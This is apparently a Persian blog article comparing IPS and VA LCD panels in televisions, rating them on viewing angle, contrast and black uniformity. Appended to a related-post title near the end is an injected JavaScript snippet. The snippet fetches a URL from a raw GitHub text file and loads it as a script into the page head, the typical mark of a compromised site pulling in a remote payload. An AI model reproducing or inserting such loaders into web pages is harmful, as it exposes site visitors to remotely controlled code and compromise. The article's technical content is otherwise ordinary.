دسته‌بندی نشده

IPS یا VA /مقایسه نوع های ال سی دی بکار برده شده در تلویزیون ها

تکنولوژی های مختلفی برای تلویزیون ها وجود دارد که به نوبه خود در کوالتی تصاویر تاثیراتی دارند. پنل های ال سی دی مختلف تکنولوژی و قابلیت های مختلفی را ارائه می دهند و انتخاب و برتری یک تلویزیون نسبت به دیگری بستگی به استفاده و نیاز افراد از تلویزیون دارد.
در این مقاله تفاوت های اصلی که میان دو نوع پنل VA و IPS وجود دارد و تاثیراتی که این تفاوت ها بر روی تلویزیون ها می گزارند را بیان خواهیم کرد. 

تفاوت میان VA و IPS 

در بسیاری از تلویزیون ها پنل ال سی دی استفاده می شود که از نور های پس زمینه LED برای روشنایی در ان ها استفاده می شود. در کل دو نوع پنل بسیار مشهور در LCD وجود دارد پنل IPS و VA و در بین این دو نیز تنها دو تفاوت اصلی و واقعی وجود دارد که پنل VA عموما نسبت کنتراست بالایی دارد و از زاویه دید ضعیفی بهرمند است و پنل IPS که نسبت کنتراست پایینی دارد اما زاویه دید گسترده را برای تلویزیون ایجاد می کند. این دو را می توان به عنوان اصلی ترین تفاوت بین این دو پنل دانست چراکه درکل پنل ها بر روی کوالتی تصاویر مانند میزان روشنایی, محدوده رنگ ها و دقت رنگ ها تاثیری ندارد.
در ادامه سه ویژگی مهم در تلویزیون ها را که پنل استفاده شده در ان تعیین کننده میزان کارایی ان ها می باشند را بررسی خواهیم کرد. 

IPSVA
زاویه دید عالیضعیف
کنتراستضعیفعالی
یکنواختی مشکیمتوسطخوب

زاویه دید

زاویه دید اشاره به قسمت هایی دارد که در ان ها می توانید تلویزیون را بدون هیچ گونه افت کیفیت قابل توجهی نگاه کنید. قطعا تلویزیون های IPS برنده این رقابت هستند چراکه تصاویر در قسمت های حاشیه ای کیفیت خود را کاملا حفظ خواهند کرد. حفظ کیفیت در زوایا مهم ترین برتری پنل های IPS بر پنل VA می باشد. در پنل های VA دقت تصاویر به صورت قابل توجهی در قسمت های حاشیه ای از بین خواهند رفت. زاویه دید محدود در این پنل ها زمانی که از تلویزیون به عنوان مانیتور استفاده می شود مشکل ساز خواهد بود. 

برنده : IPS

کنتراست

نسبت کنتراست از فاکتور های بسیار مهم برای کیفیت و کوالتی تصاویر است. این ویژگی تعیین می کند که تلویزیون تا چه حدی می تواند رنگ های مشکی را نمایش دهد بنابراین یک تلویزیون با کنتراست خوب عمق رنگ های مشکی را در اتاق های تاریک به خوبی نمایش می دهد درهر حال اگر تلویزیونی دارای نسبت کنتراست پایین باشد در اتاق های تاریک رنگ های مشکی به صورت خاکستری به نمایش در می ایند. پنل های VA از نظر کنتراستی نسبت به پنل IPS بسیار بهتر عمل می کنند بنابراین اگر می خواهید در اتاق های تاریک فیلم تماشا کنید پنل های VA بهترین گزینه برایتان خواهد بود. در مدل های بالا رده در این پنل از قابلیت لوکال دیمینگ برای ارتقا دو برابر سطح رنگ های مشکی استفاده می شود. از طرفی پنل های IPS نسبت کنتراست پایینی دارند بنابراین رنگ های مشکی به خاکستری بیشتر نزدیک هستند البته این تفاوت کنتراست در اتاق های روشن چندان به چشم نخواهد امد. 

برنده : VA

یکنواختی مشکی 

درکل تلویزیون های ال ای دی نمی توانند رنگ های مشکی را به صورت یکنواخت و عالی نمایش دهند و و برخلاف زاویه دید و کنتراست نوع پنل تاثیر زیادی بر یکنواختی مشکی نخواهد داشت. درکل بیتشر پنل های VA از یکنواخت مشکی خوبی برخوردارند و پنل های IPS از یکنواختی مشکی متوسطی برخوردارند. البته این بدان معنا نیست که تمامی پنل های VA یکنواختی مشکی خوبی دارند و ممکن است این ویژگی در بین واحد ها و مدل های مختلف متفاوت باشد. این قابلیت با استفاده از لوکال دیمینگ به خوبی تقویت می شود. 

برنده : VA

مقایسه تلویزیون های QLED, OLED و LED

مقایسه تلویزیون های سامسونگ QLED مدل QN90A و سونی OLED مدل A80J

بررسی تلویزیون QLED سامسونگ مدل  Q60A (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *